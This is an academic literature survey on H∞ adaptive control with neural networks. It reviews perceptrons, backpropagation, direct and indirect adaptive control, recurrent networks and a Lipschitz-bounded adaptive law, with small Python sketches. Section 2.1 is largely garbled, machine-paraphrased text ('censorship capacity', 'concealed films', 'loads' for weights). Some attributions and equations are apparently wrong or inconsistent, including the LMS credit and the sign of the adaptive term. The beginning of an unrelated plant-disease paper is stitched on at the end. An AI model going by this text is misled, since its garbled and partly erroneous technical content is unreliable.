Abstract This literature survey reviews the work available on the H∞ adaptive control architecture using neural networks for systems whose uncertainty has an unknown structure. This architecture merges ideas from robust control theory, such as the H∞ control framework, the small gain theorem, and L stability theory, with Lyapunov stability theory and recent theoretical achievements in adaptive control, to build an adaptive design for systems whose uncertainty satisfies a local Lipschitz bound. The method enables a control designer to simplify the adaptive tuning procedure, band-limit the adaptive control signal, and handle unmatched uncertainty within a single design framework. Robust control design limits the impact of uncertainty and nonlinearity at the expense of reduced performance; the design framework here is similar to that used in robust control, but without sacrificing performance. All of this is achieved while providing notions of transient performance bounds that depend on the properties of two linear systems and the adaptation gain. The relevance of neural networks in control systems, feed-forward neural networks, direct and indirect adaptive control, and the H∞ controller is also reviewed.

Keywords Neural network · Feed forward neural network · Adaptive control · h-infinity control · Lipschitz nonlinearities

1 Introduction

Model reference adaptive control (MRAC) offers various advantages over modern linear model-based control design methods. Classical techniques are constrained by uncertainties and nonlinearities. Robust control design reduces the impact of uncertainty and nonlinearity at the expense of reduced performance. Both of these approaches, however, offer the advantage of frequency-limited control action. Adaptive control offers the possibility of achieving a much higher
P. Kashyap (B)
Department of Electrical Engineering, Madan Mohan Malaviya University of Technology,
Gorakhpur, India


level of robust performance. A noteworthy weakness of adaptive control, however, is that it lacks accepted methods for quantifying the behavior of the control signal a priori. The H∞ adaptive architecture is a blended structure that permits the use of linear control design methods to achieve potentially lower-bandwidth control signals using well-understood design tools; this allows the design procedure to become intuitive. Modification of the linear control design enables one to trade off reference-model tracking error against adaptive control effort in a way that is explicitly optimal with respect to the H∞ norm. This literature survey introduces the H∞ adaptive control design for systems with a Lipschitz bound on their uncertainty. The combined approach merges ideas from robust control theory, such as H∞ control design and the small gain theorem, L stability theory, and Lyapunov stability from nonlinear control, with more recent theoretical achievements in adaptive control [6, 7]. By introducing some additional structure on the system uncertainty, namely a bound on the Lipschitz constant, frequency-domain considerations can be introduced into the adaptive design.
All of this is accomplished while providing notions of transient performance bounds. The presented norm bounds on the transient performance enable a designer to guarantee that the response remains within a desired error tolerance of the reference model by increasing the adaptation gain and decreasing the H∞ norm of two distinct linear systems. Since the system state is confined to a ball of computable size, the analysis is valid for locally Lipschitz nonlinearities [8]. In addition, although the bounds can be conservative, they are computable using a straightforward numerical procedure, and H∞ optimal control methods give guidance on how to suppress these bounds.

2 Neural Networks

The history of neural networks can be traced back to the modeling of the neuron. The first representation of a nerve cell was used by the physiologists McCulloch and Pitts. Their modeled neuron had a single output and two types of inputs; the inputs carried a single, identical weight, and the output fired only when the weighted sum of the inputs exceeded a fixed threshold value. Rosenblatt subsequently developed the perceptron as the next model able to accomplish "learning"; Rosenblatt used a trial-and-error method and interconnected perceptrons randomly to modify the weights [9]. The model framed by McCulloch and Pitts remains an improved, simplified representation of an electrochemical system, and this neuron is the basis of the modern field of neural networks [16]. The perceptron appears to resemble a neuron, but the resemblance does not capture the intricate electrochemical processes that actually go on inside a nerve cell. A neuron works like a voltage-to-frequency converter because of its electrochemical mechanism: the neuron fires because of a chemical reaction, and when a specific threshold is reached it fires at a higher frequency. When a larger input arrives at the neuron, the magnitude of the output from the neuron stays the same [14]. The perceptron is an extremely simple mathematical representation of the neuron.
Based on minimizing the squared error and assuming a desired response exists, a gradient search approach was implemented; this technique later became known as least mean squares (LMS). Over recent decades, LMS and related methods have been used in a wide variety of applications. A mathematical technique was thus given for limiting the error, and with a gradient search strategy the learning is no longer trial and error. The idea of weight adjustment for the perceptron was conveyed by Selfridge [2, 3]: if performance did not improve, another random direction vector was selected. This is the technique referred to as hill climbing; when phrased in terms of minimization, it is referred to as descending along the gradient. A mathematical technique for adjusting the weights was created by Nguyen and Hoff [6].
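A minimal sketch of the LMS gradient-descent weight update discussed above is given below for a single linear neuron; the data and the learning rate are placeholders chosen only so that the toy example converges.

```python
import numpy as np

def lms_train(X, d, lr=0.01, epochs=50):
    """LMS: adjust weights down the gradient of the squared output error."""
    w = np.zeros(X.shape[1])
    for _ in range(epochs):
        for x, target in zip(X, d):
            error = target - w @ x          # error between desired and actual output
            w += lr * error * x             # gradient-descent step on 0.5 * error**2
    return w

rng = np.random.default_rng(1)
X = rng.normal(size=(200, 3))
true_w = np.array([1.0, -2.0, 0.5])
w = lms_train(X, X @ true_w)
print(w)   # should approach true_w for this noiseless linear example
```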
Backpropagation later re-emerged without these restrictions. A multilayer neural network can be built and trained by arranging perceptrons in a multilayer array; the weights, beginning with the output-layer weights, are adjusted by backpropagation. The perceptron representation can be adapted to the backpropagation algorithm by using a sigmoidal function as the squashing function, whereas earlier forms of the perceptron used the signum function. The sigmoidal function is differentiable everywhere the signum function is not, which enables the neural network to converge toward a neighboring (local) minimum, and gradient information can pass through the nonlinear squashing functions with the backpropagation algorithm. This provided a greatly improved counterpart to the electrochemical model framed by McCulloch and Pitts. In the field of neural networks the convergence credentials are generally excellent. Roughly 25 years earlier, the first period of intensive network research had ended; currently, research in the area is being re-invigorated following the rediscovery of backpropagation. Feed-forward neural networks are widely exploited and frequently discussed, and a feed-forward neural network with the backpropagation algorithm will be the foundation of the work reviewed here.
2.1 Feed-Forward Neural Network

Among censorship capacity normally sigmoidal capacity, feed forward neural system
be a system perceptrons. Utilizing limiting error squared, back propagation algorithm
modifies weights [7]. For changing loads over numerous concealed films back prop-
agation algorithm permits differentiable censorship capacity. In direction of modify
loads n-distinct issues be able to illuminated. Select OR plus XOR question be
capable of unraveled by containing numerous nodes on each level. Starting contribu-
tion to output feed-forward neural system is associated in addition to on contiguous
344 P. Kashyap

layers every node be associated with each joint. The yield as of an earlier layer be
contribution to hub if hub be lying on yield layer plus contribution toward neural
organization being influence to pivot. On way to formulate neural organization vital
is pivot. To set up neural framework key is hub. On double, heaps of one individual
hub can be distorted by altering heaps using back inducing figuring. Scheduled inter-
pretation of an introverted output, reasonable formulating progression ends awake
plausible through neural organization, by unscrambling neuronal arrangement toward
nodes. For invigorating tons, back propagation algorithm be an LMS-as computation
[15].
During the training process, the outputs of the first layer of nodes are fed to the
second layer of nodes, and so on, until the output emerges from the neural network
progression. The error is determined by comparing the desired output with the actual
output.
The error is then used, starting from the output nodes and working in reverse through
the neural network, to adjust the weights. One deficiency of this weight-adjustment
scheme is that the weights of a large number of nodes on the same layer cannot be
initialized to identical values, because the weights would then be adjusted identically
for every node that starts with the same weights on each layer. The weights on each
layer would be adjusted, but the majority of the neural network's weights would remain
at their initial value of zero; the resulting mathematical model would behave as if each
layer had a single node.
Another motivation for initializing the weights randomly is to search the weight space
appropriately. However, randomly initialized weights make it extremely hard to assess
the fundamental performance of a controller design.
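As a minimal numerical sketch of the feed-forward network and back propagation weight update described in this subsection, the following fragment trains a one-hidden-layer sigmoidal network on the XOR problem mentioned above. The layer sizes, learning rate and iteration count are illustrative assumptions, not taken from the surveyed papers.

```python
import numpy as np

# One-hidden-layer feed-forward network trained by back propagation on XOR.
# Sigmoid squashing function, squared error, gradient descent on the weights.
rng = np.random.default_rng(0)
X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=float)
T = np.array([[0], [1], [1], [0]], dtype=float)

W1 = rng.normal(size=(2, 4))          # input -> hidden weights (random init)
b1 = np.zeros(4)
W2 = rng.normal(size=(4, 1))          # hidden -> output weights
b2 = np.zeros(1)
sigmoid = lambda z: 1.0 / (1.0 + np.exp(-z))
lr = 1.0

for _ in range(10000):
    # forward pass
    h = sigmoid(X @ W1 + b1)
    y = sigmoid(h @ W2 + b2)
    # backward pass: propagate the output error towards the input layer
    d_out = (y - T) * y * (1 - y)
    d_hid = (d_out @ W2.T) * h * (1 - h)
    W2 -= lr * h.T @ d_out;  b2 -= lr * d_out.sum(axis=0)
    W1 -= lr * X.T @ d_hid;  b1 -= lr * d_hid.sum(axis=0)

print(np.round(y.ravel(), 2))   # should approach [0, 1, 1, 0]
```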

2.2 Feedback Neural Network

Feedback (or recurrent, or interactive) networks can have signals travelling in both
directions by introducing loops in the network. Feedback networks are powerful and can
become extremely complicated. Computations derived from earlier inputs are fed back into
the network, which gives them a kind of memory. Feedback networks are dynamic: their
'state' keeps changing until they reach an equilibrium point. They remain at the
equilibrium point until the input changes and a new equilibrium must be found.
As an example of a feedback network, consider Hopfield's network. The primary use of
Hopfield's network is as associative memory. An associative memory is a device which
accepts an input pattern and produces as output the stored pattern most closely
associated with the input. The function of the associative memory is to recall the
corresponding stored pattern and then produce a clear version of that pattern at the
output. Hopfield networks are ordinarily used for problems with binary pattern vectors,
and the input pattern may be a noisy version of one of the stored patterns. In the
Hopfield network, the stored patterns are encoded as the weights of the network.
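A hedged sketch of this associative recall, assuming small hand-made binary patterns: the stored patterns are encoded in the weight matrix by the Hebb rule, and a noisy probe is driven towards the nearest stored pattern.

```python
import numpy as np

# Minimal Hopfield associative-memory sketch with two illustrative +1/-1 patterns.
patterns = np.array([[ 1, -1,  1, -1,  1, -1],
                     [ 1,  1,  1, -1, -1, -1]])
W = sum(np.outer(p, p) for p in patterns).astype(float)   # Hebb rule
np.fill_diagonal(W, 0)                                     # no self-connections

probe = np.array([1, -1, -1, -1, 1, -1])   # first pattern with one bit flipped
state = probe.copy()
for _ in range(10):                        # synchronous updates until settled
    state = np.sign(W @ state)
    state[state == 0] = 1

print(state)                               # recalls the first stored pattern
```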

3 Adaptive Controllers

An adaptive control system can be characterized as a feedback system with the capacity
to modify its characteristics in a dynamic environment according to explicit criteria.
Adaptive controllers learn to improve their performance through observations of the
process under control.
Gain scheduling is considered the simplest form of adaptive control. A process variable
that is not part of the feedback loop and that distinguishes different operating
conditions is selected, and linear controllers for a range of such operating conditions
are designed. Parameters or gains are scheduled and selected based on the process
variable. The benefit of gain scheduling is that it is expedient to apply, specifically
for well-known plants. The parameters can be changed in response to variations within
the operating condition. Gain scheduling is a widespread choice in the design of control
laws (a brief illustrative sketch is given at the end of this section).
Adaptive systems apply two strategies, in particular, indirect adaptive control and
direct adaptive control. When a reasonable model exists, direct adaptive control can be
applied together with an accompanying neural network. When a model must first be
created, indirect adaptive control is applied. To build a gradient for convergence, the
Jacobian is used in the update calculation of the model adapted by the controller.
The error must be back propagated through the plant's Jacobian matrix, because the plant
lies between the output error that is to be minimized and the adaptive neural network.
Learning the Jacobian is therefore required for this methodology.
For SISO plants, partial derivatives can be used in place of the Jacobian. The amount of
learning required about the plant is a serious disadvantage of direct adaptive control.
The same is not required in the indirect adaptive control scheme. Two neural networks, a
plant emulator and a controller, are mandatory in the indirect adaptive control scheme.
The emulator is a feed-forward neural network, and the plant emulator should be trained
offline with an adequately large data set. The emulator provides an efficient approach
for performing identification by means of back propagation, as well as for computing the
plant's derivatives. By treating the two networks together as one larger network, the
parameters of the controller can be adjusted. An on-line training procedure can be
executed on the two networks. Indirect adaptive control is especially attractive for a
wide assortment of control problems. If adequate data is accessible, then the indirect
technique functions well. Both the indirect technique and direct adaptive control depend
on back propagation to converge the neural network weights. Research in the region of
direct adaptive control has been completed inside a closed loop with the addition of a
fixed-gain controller.
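The gain-scheduling idea introduced at the start of this section can be sketched as follows; the operating points and tabulated gains are invented purely for illustration.

```python
import numpy as np

# Gain scheduling sketch: linear controller gains designed at a few operating
# points are interpolated against a scheduling variable (e.g. load or speed).
operating_points = np.array([0.0, 0.5, 1.0])   # scheduling variable values
kp_table = np.array([2.0, 1.2, 0.8])           # proportional gains per point
ki_table = np.array([1.0, 0.6, 0.3])           # integral gains per point

def scheduled_gains(sched_var):
    kp = np.interp(sched_var, operating_points, kp_table)
    ki = np.interp(sched_var, operating_points, ki_table)
    return kp, ki

# the controller then runs with whichever gains match the current condition
print(scheduled_gains(0.75))
```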

3.1 Direct and Indirect Adaptive Techniques

Adaptive control, as used currently by control technologists, is usually classified into
direct and indirect adaptive methods. Direct adaptive controllers have their parameters
changed immediately in light of the plant behavior; Fig. 1 presents an example of direct
adaptive control [13]. Here, r(t) is the reference input to the controller, and ec(t) is
the error between the plant output and the reference, which is used to adjust the gains
of the controller. Within the direct adaptive control classification, model reference
adaptive control (MRAC) is a popular choice for aircraft. In MRAC, the controller is
driven by means of a reference model, and the control parameters are tailored so that
the plant output follows the output of the reference model [5, 6]. The MRAC strategy may
moreover have reduced overall performance because of modeling errors when the plant is
under the influence of input disturbances. The MRAC technique has no direct mechanism to
validate the adapted controller before its use on the plant. For complicated nonlinear
structures this may likewise lead to adverse effects.
In the indirect adaptive controller technique, an identifier (ID) model of the plant is
used to support the parameter adjustment procedure of the controller. Adaptive control
has been described as "a procedure of applying some system identification technique to
acquire a model of the process and its environment from input-output experiments and
utilizing this model to design a controller" [9, 15]. System identification additionally
aims to give a better understanding of the dynamics of the process under control. System
identification and adaptive controllers have a rich history, and an enormous assortment
of strategies has been reported in the literature.
In Fig. 2, the indirect adaptive controller scheme is displayed. Here, both the plant
output and the ID model output are used to tune the gains of the controller. The
controller outputs are validated against the plant model and hence checked before being
given to the plant. A self-tuning controller is an example of an indirect adaptive
regulator. Here, the error difference between the reference input and the plant output
is used to compute the following set of plant inputs [10, 11]. The self-tuning
controller has been a prevalent choice for indirect adaptive control for linear as well
as nonlinear systems.
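As a hedged numerical illustration of the direct MRAC scheme discussed above, the following first-order example adapts two controller gains with the classical MIT rule; the plant, reference model, adaptation gain and reference signal are assumptions made purely for this sketch.

```python
import numpy as np

# Direct MRAC sketch (MIT rule) for a first-order plant.
a, b = 1.0, 0.5            # plant: dy/dt = -a*y + b*u (unknown to the controller)
am, bm = 2.0, 2.0          # reference model: dym/dt = -am*ym + bm*r
gamma = 1.0                # adaptation gain
dt, T = 1e-3, 100.0
th1 = th2 = 0.0            # adjustable gains of the control law u = th1*r - th2*y
y = ym = xf_r = xf_y = 0.0 # plant, model and sensitivity-filter states

for k in range(int(T / dt)):
    t = k * dt
    r = 1.0 if (t % 20.0) < 10.0 else -1.0      # square-wave reference
    u = th1 * r - th2 * y                       # direct adaptive control law
    e = y - ym                                  # model-following error
    th1 += dt * (-gamma * e * xf_r)             # MIT-rule gain updates
    th2 += dt * ( gamma * e * xf_y)
    y    += dt * (-a * y + b * u)               # Euler integration of the plant
    ym   += dt * (-am * ym + bm * r)            # and of the reference model
    xf_r += dt * (-am * xf_r + am * r)          # filtered sensitivity signals
    xf_y += dt * (-am * xf_y + am * y)

print("adapted gains:", th1, th2, "ideal gains:", bm / b, (am - a) / b)
```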

Fig. 1 Direct adaptive control block illustration

Fig. 2 Indirect adaptive control block diagram

3.2 Neural Networks for Identification and Control

Werbos identifies four particular features of neural networks when compared with other
methods: the general mapping capability of neural networks (like the Taylor series), the
availability of neural network hardware for implementation, the learning algorithms of
NNs, and the similarity of NNs to the brain [10]. Neural networks are classified based
on architecture as multi-layer perceptron (MLP), radial basis function (RBF) networks
and recurrent neural networks. MLP networks are the most straightforward type of neural
network, wherein each neuron in a given layer is connected with each neuron in its
neighboring layer [11]. An MLP can contain various layers and a distinct activation
function for every neuron. For the most part, RBF networks have a single hidden layer
with fixed activation functions common to all neurons in the hidden layer. Training RBF
networks is viewed as quicker, and the network offers superior performance in
applications such as fault diagnostics. However, MLP networks have the flexibility of
choosing from a large group of linear and nonlinear activation functions for the
hidden-layer and output-layer neurons, as compared with the fixed types for RBF
networks. MLP networks are considered global approximators, as compared with the local
approximations of the RBF networks [2]. In addition to the weight computation, RBF
networks require knowledge of the center and width of the basis function for every
neuron.
Recurrent neural networks (RNNs) are feed-forward networks with earlier values of the
network inputs and outputs fed back as a component of the present inputs [8]. This gives
appropriate retention capabilities to the network, because of which the network gives
better approximations as compared with non-recursive networks. The work examined in this
survey uses modifications of recurrent MLP networks based on autoregressive structures.
Figure 3 shows the structure of a typical RNN used in this paper. This network comprises
a single hidden layer with four neurons. This example additionally demonstrates a single
set of past outputs and a single past input provided as present inputs. It has been
found that the output of a network has a dependence on its past outputs. Hence, with the
incorporation of past inputs and outputs, the approximation capability of an RNN is
viewed as much superior to that of an MLP.
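A small sketch of the autoregressive regressor structure described above, assuming an arbitrary nonlinear difference equation as the plant and a single hidden layer of four neurons (as in the Fig. 3 example); scikit-learn's MLPRegressor is used only for convenience and is not the network used in the surveyed work.

```python
import numpy as np
from sklearn.neural_network import MLPRegressor

# One past output y(k-1) and one past input u(k-1) are fed as present inputs
# to predict y(k) (NARX-style structure).
rng = np.random.default_rng(0)
u = rng.uniform(-1, 1, 2000)
y = np.zeros_like(u)
for k in range(1, len(u)):
    y[k] = 0.6 * np.tanh(y[k - 1]) + 0.4 * u[k - 1]   # illustrative "plant"

X = np.column_stack([y[:-1], u[:-1]])   # regressors: y(k-1), u(k-1)
t = y[1:]                               # target: y(k)

net = MLPRegressor(hidden_layer_sizes=(4,), activation="tanh",
                   max_iter=5000, random_state=0).fit(X[:1500], t[:1500])
print("one-step-ahead R^2 on held-out data:", net.score(X[1500:], t[1500:]))
```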
The basics of artificial neural networks are well explained by Simon Haykin in Neural
Networks [7, 8]. Independent of the design, neural networks pursue training and
validation as two separate stages. When the network is periodically refreshed to obtain
a progressively better understanding of the plant while the plant is functioning, it is
called 'on-line' trained. The network is called 'off-line' trained when the training and
the utilization (or validation) stages are isolated in time.
Neural networks have been utilized for system identification and control of different
plants, for example industrial robots, commercial and fighter aircraft, automobiles,
power generation, motors and drives, and chemical processes [4]. Werbos has grouped
neural networks for control into five general classes, namely:
1. Supervisory controller,
2. Inverse controller,
3. Adaptive controller,
4. Back propagation with utility,
5. Adaptive critic-based controller (Fig. 3).
The most straightforward type of neural network controller is of the supervisory sort.
Here, a network learns to mimic another controller (supervisor) via training with input
and output data from the parent controller. This is regularly described as a strategy
which imitates the behavior of another person or a system. For the most part, a
supervisory neural controller performs exactly as well as the human expert, or worse. In
any case, in a large portion of cases this technique utilizes an off-line trained model
as the controller and consequently lacks adaptability.

Fig. 3 Recurrent neural network example
In its ordinary structure, supervisory control is an open-loop control strategy where
the network is trained with input and output data obtained from past experience; thus
there is no mechanism for limiting the error between the system output and the reference
during use. The cerebellar model articulation controller (CMAC) is a kind of supervisory
controller technique.

4 H∞ Controller

The "infinity" in H∞ means that this type of control is designed to impose a minimax
constraint, in the sense of decision theory, in the frequency domain. The fundamental
problem of H∞ control, roughly, is to optimize (by choice of compensator in a typical
feedback configuration) some worst-case (i.e., infinity norm) measure of performance
while maintaining stability [14].
In H∞ control, we consider the following closed loop system representation with an
"extended system":
• w is an exogenous input (m1 × 1) containing at least the reference signal r and
possibly other exogenous signal such as a noise model n.
• z is the performance output (p1 × 1) a virtual output signal only used for design.
• ũ is the control input (m2 × 1), computed by the controller C(s).
• ỹ is the measured output (p2 × 1), available to the controller C(s) (Fig. 4).
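Since the H∞ norm of a stable transfer function is its worst-case gain over frequency, it can be approximated numerically by sweeping the frequency response; the transfer function below is an arbitrary second-order example chosen purely for illustration.

```python
import numpy as np
from scipy import signal

# ||G||_inf = sup_w |G(jw)| for a stable SISO system (largest singular value
# of G(jw) in the MIMO case). Example: G(s) = 1 / (s^2 + 0.2 s + 1).
G = signal.TransferFunction([1.0], [1.0, 0.2, 1.0])
w = np.logspace(-2, 2, 4000)
_, resp = signal.freqresp(G, w)
hinf_norm = np.max(np.abs(resp))
print("approximate H-infinity norm:", hinf_norm)   # peak of the Bode magnitude
```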

Fig. 4 H infinity controller (extended system with inputs w, u and outputs z, y, and controller C(s))

5 Robust Adaptive Control

To achieve robust adaptive control, we need not only to identify the nominal plant, but
also to quantify the model uncertainty in the adaptive modeling part. Moreover, we need
to use both the nominal plant model and the measure of the model uncertainty to
self-tune the adaptive control law based on H∞ robust control. The problem is the
equivalence of the two least-squares algorithms, and/or under what conditions they are
equivalent.
An obvious complication for the unification of identification and control in H∞ is the
lack of recursive algorithms using real time data. It is possible to transmute the
frequency domain least-squares algorithm into the time domain one [13].
The use of H∞ control for the control part also gives the opportunity to implement the
resulting control law adaptively, because the H∞ norm is an induced norm in terms of the
2-norm (i.e., the size of the energy). This is also manifested by the H∞ performance
index in the time domain [14]. The problem is clearly the computational complexity
associated with H∞ design, which prohibits its implementation in real time. Recall that
we do not know the true system except for the identified model, which is a function of
time t. Thus, the H∞ controller needs to be designed for each identified plant, which is
simply not possible for real time implementation. A periodic signal is injected that
ensures persistent excitation at the plant input.
Then it can be shown that the least-squares algorithm in the frequency domain is
equivalent to a specialized recursive least-squares algorithm asymptotically [16].
Fortunately, the amplitude of the periodic signal is not large, which keeps the
resulting performance degradation small. Second, the time domain performance index is
used to convert the infinite horizon problem for H∞ control into the finite horizon
problem at each time instance. In this case the two algebraic Riccati equations involved
in H∞ control become Riccati difference equations that can be solved recursively, and
thus allow the real time accomplishment of the robust model reference control.
Under certain conditions, the finite horizon H∞ control converges to the infinite
horizon H∞ control [15]. Hence, robust adaptive control can be achieved. Because the
identified model is very inaccurate at the early stage of adaptive control, model
validation is employed to monitor the closed loop system. If the system produces
undesirable sizes of signals, the H∞ controller designed for the finite horizon case
must be shut off. This prevents the system from suffering extremely poor performance
(Fig. 5).
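The recursive least-squares identification referred to above can be sketched as follows; the plant parameters, excitation signal and forgetting factor are illustrative assumptions and are not taken from the paper.

```python
import numpy as np

# Minimal recursive least-squares (RLS) identification of a first-order ARX plant.
rng = np.random.default_rng(1)
true_theta = np.array([0.8, 0.5])           # y(k) = 0.8 y(k-1) + 0.5 u(k-1)
theta = np.zeros(2)                         # parameter estimate
P = 1000.0 * np.eye(2)                      # covariance of the estimate
lam = 0.99                                  # forgetting factor

y_prev, u_prev = 0.0, 0.0
for k in range(500):
    u = np.sin(0.1 * k) + 0.5 * rng.standard_normal()    # persistently exciting input
    phi = np.array([y_prev, u_prev])                     # regressor vector
    y = true_theta @ phi + 0.01 * rng.standard_normal()  # measured output
    # RLS update
    K = P @ phi / (lam + phi @ P @ phi)
    theta = theta + K * (y - phi @ theta)
    P = (P - np.outer(K, phi @ P)) / lam
    y_prev, u_prev = y, u

print("estimated parameters:", theta)
```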

6 Stability Analysis

1: H infinity Adaptive Control Law for Nonlinearities


Assume that the system dynamics can be expressed as

ẋ = Ax + Bu + D f (x) (1)

Fig. 5 The block diagram of robust adaptive control

where A ∈ Rn×n, B ∈ Rn×m, D ∈ Rn×j, x ∈ Rn is the system state, u ∈ Rm is the system
control input, and f(x): Rn → Rj satisfies the following Lipschitz property

‖f(x) − f(y)‖∞ ≤ L ‖x − y‖∞ (2)

where L is the Lipschitz constant of the nonlinearity, and

‖f(0)‖∞ ≤ K < ∞ (3)

so that K ∈ R+ is an upper bound for f(·) at the origin.


Remark 1.1: Note that D allows for an extensive class of uncertainty. If D = B, the
system model reduces to the system used in the MRAC scheme subject to a matched
uncertainty condition. Assume that there exists a nominal control law that renders the
closed-loop system matrix Hurwitz and provides the desired system tracking
characteristics, assuming that the system uncertainty, f(x), is zero.

u n = −K x x + K r r (4)

It is desired to track the ideal system performance (f(x) = 0) within a bounded error.
To define the desired behavior, the following closed loop reference model is defined

ẋm = Am x + Bm r (5)

where Am = A − BKx and Bm = BKr. In order to compensate for the system uncertainty and
to make certain that the reference model is tracked with a bounded error, we augment the
nominal control law with an adaptive signal. The complete controller is defined as

u = u n − u ad (6)

where uad will be defined shortly. Applying this control law to the system dynamics, we
rewrite the system dynamics as

ẋ = Am x−Bu ad + B K r r + D f (x) (7)

It is assumed that f(x) is unknown, but can be approximated to an adequate degree of
accuracy by a linear-in-parameters neural network over a compact set.
We assume that the neural network approximates f(x) as

f(x) = WT β(x) + e(x) (8)

where β(x): Rn → Rs is a vector of known basis functions, W ∈ Rs×j is a set of unknown
ideal weights, and ∃ e* > 0 s.t. e(x) < e* < ∞ ∀ x ∈ Dx. The ideal weights are assumed
to lie in a known compact set. With this
assumption, the closed loop dynamics become

ẋ = Am x − B uad + B Kr r + D (WT β(x) + e(x)) (9)

where Ŵ ∈ Rs×j is a set of adaptive weights to be determined online. Defining the
emulation error as ê = x − x̂ (with x̂ the emulator state) and the weight estimation
error as W̃ = Ŵ − W, the emulation error dynamics can then be expressed as

ê´ = Am ê − Bu ad + Dw(t) (10)

Forming the error between the reference model and the emulator, the tracking error
dynamics can be expressed as

ė = Am e + Bu ad + Dw(t) (11)

where w(t) = −W̃T β(x).


Let the dynamics of this control law be defined by

ẋe = Ae xe + Be [e w]T
uad = Ce xe + De [e w]T (12)

This allows for a broad class of linear control laws to be
applied. Let the weight update law for the adaptive weights be defined as

Ẇ = Proj(Kw β(x) eT P D) (13)

The projection bound on the projection operator is Wmax. If the control law is designed
to minimize the H∞ norm of the transfer function from w(t) to e(t), then this defines
the complete H∞ adaptive control law.
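A hedged sketch of the weight update law (13) with a simple norm-based projection is given below; the dimensions, the adaptation gain and the projection rule are placeholders, and the Proj operator used in the cited works may differ in detail.

```python
import numpy as np

# Sketch of one discretized step of the adaptive weight update with a crude
# projection that keeps ||W|| <= Wmax. All names are illustrative.
def proj_update(W, beta_x, e, P, D, K_w, W_max, dt):
    dW = K_w * np.outer(beta_x, e @ P @ D)   # raw update direction (s x j)
    W_new = W + dt * dW
    norm = np.linalg.norm(W_new)
    if norm > W_max:                         # project back onto the weight ball
        W_new *= W_max / norm
    return W_new
```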

7 Conclusions

In this work, a broad literature survey is conducted for H∞ adaptive control design
using neural networks for systems related to control frameworks. Different models are
discussed in detail, and their suitability for specific applications is highlighted. A
neural network H∞ adaptive controller architecture is determined that enables a control
engineer to tune the reference model following qualities through linear control design
methods, band-limit the adaptive control signal, and treat un-matched uncertainty within
a single design framework for systems with an unknown nonlinearity.
Neural networks can be considered as nonlinear function approximation instruments (i.e.,
linear combinations of nonlinear basis functions), where the parameters of the networks
are found by applying optimization strategies. The optimization is carried out with
respect to the approximation error measure. In general, it is sufficient to have a
single hidden layer neural network (MLP, RBF or other) to learn the approximation of a
nonlinear function. In such cases, general optimization can be applied to discover the
update rules for the synaptic weights.

References

1. Narendra, K. S., & Parthasarathy, K. (1990). Identification and control of dynamical systems
using neural networks. IEEE Transactions on Neural Networks, 1(1), 4–27.
2. Greene, M. E., & Tan, H. (1991). Indirect adaptive control of a two-link robot arm using
regularization neural networks. In Proceedings of the International Conference on Industrial
Electronics, Control and Instrumentation (Vol. 2, pp. 952,135).
3. Tanomaru, J., & Omatu, S. (1991). On the application of neural networks to control and inverted
pendulum: An overview. In Proceedings of the 30th SICE.
4. Jin, Y., Pipe, T., & Winfield, A. (1993). Stable neural network control for manipulators.
Intelligent Systems Engineering, 2(4), 213–222.
5. Brown, R. H., Ruchti, T. L., & Feng, X. (1993). Artificial neural network identification of
partially known dynamic nonlinear systems. In Proceedings of 32nd Conference on Decision
and Control (Vol. 4, pp. 3694–3699).
6. Nordgren, R. E., & Meckl, P. H. (1993). An analytical comparison of a neural network and a
model-based adaptive controller. IEEE Transactions on Neural Networks, 4(4), 685–694.
7. Yao, B., & Tomizuka, M. (2001). Adaptive robust control of MIMO nonlinear systems in
semi-strict feedback forms. Automatic, 37(9), 1305–1321.
8. Khalil, H. K. (2002). Nonlinear systems. Prentice Hall.
9. Hoagg, J. B., & Bernstein, D. S. (2004). Direct adaptive dynamic compensation for minimum
phase systems with unknown relative degree. In Proceedings of 43rd IEEE Conference on CDC
Decision and Control (Vol. 1, pp. 183–188).

10. Lavretsky, E., & Hovakimyan, N. (2005). Adaptive compensation of control dependent
modeling uncertainties using time-scale separation. In Proceedings and 44th IEEE Conference
on 2005 European Control Conference Decision and Control CDC-ECC ’05 (pp. 2230–2235),
12–15 December 2005.
11. Volyanskyy, K. Y., Calise, A. J., & Yang, B. J. (2006). A novel q-modification term for adaptive
control. In American Control Conference (p. 5).
12. Cao, C., & Hovakimyan, N. (2006). Design and analysis of a novel l1 adaptive controller,
part1: Control signal and asymptotic stability. In Proceedings of American Control Conference
(pp. 3397–3402), 14–16 June 2006
13. Yu, B., Shi, Y., & Huang, J. (2009). Step tracking control with disturbance rejection for networked
control systems with random time delays. In Proceedings of the Joint 48th IEEE Conference on Decision
and Control and 28th Chinese Control Conference (pp. 4951–4956), Shanghai, China.
14. Chadli, M., & Guerra, T. M. (2012). LMI solution for robust static output feedback control of
discrete Takagi-Sugeno models. IEEE Transactions on Fuzzy Systems, 20(6), 1160–1165.
15. Wu, Z.-G., Shi, P., Su, H., & Chu, J. (2013). Network-based robust passive control for fuzzy
systems with randomly occurring uncertainties. IEEE Transactions on Fuzzy Systems, 21(5),
966–971.
16. Bouarar, T., Guelton, K., & Manamanni N. (2013). Robust non-quadratic static output feed-
back controller design for Takagi-Sugeno systems using descriptor redundancy. Engineering
Applications of Artificial Intelligence, 26(2), 739–756.
A Novel DWT and Deep Learning Based
Feature Extraction Technique for Plant
Disease Identification

Kirti, Navin Rajpal, and Jyotsna Yadav

Abstract Disease detection in plants has been proven to be a very cumbersome


job due to numerous limitations for example noise, illumination variations, color
variations etc. Therefore, robust feature extraction becomes a difficult task when
colored images are utilized for classification. In this work, a novel feature extraction
technique is proposed where large scale coefficients based on discrete wavelet trans-
form (DWT) are extracted from each channel of digital colored leaf images. Then,
further significant features are selected using principal component analysis (PCA)
of selected approximation coefficients from red, green and blue components of plant
leaf images using orthogonal wavelets. Deep neural networks (DNNs) are further
utilized for analysis of robust DWT-PCA colored image features and classification
purpose because of the advantages that they perform better with large datasets. DNN
architectures are pre-trained architectures which are trained on ImageNet database
which contains millions of real-life objects training features. In this work, six types
of pre-trained DNN architectures are used for extensive experimental analysis. The
proposed plant disease identification system for colored images yields an accuracy
up to 99% and performed much better than the presently existing systems.

Keywords Disease recognition · DWT · PCA · Plant Village · Deep neural


networks (DNNs) · Multi-resolution analysis

1 Introduction

The agriculture sector contributes a major share of the income sources of India, and hence
the contribution of the agriculture sector to the national economy is indisputable. About
thirteen percent of the GDP depends on the agricultural sector. However,

Kirti · N. Rajpal · J. Yadav (B)


University School of Information, Communication and Technology, Guru Gobind Singh
Indraprastha University, Delhi, India
e-mail: jyotsnayadav@ipu.ac.in
N. Rajpal
e-mail: navin.rajpal@ipu.ac.in

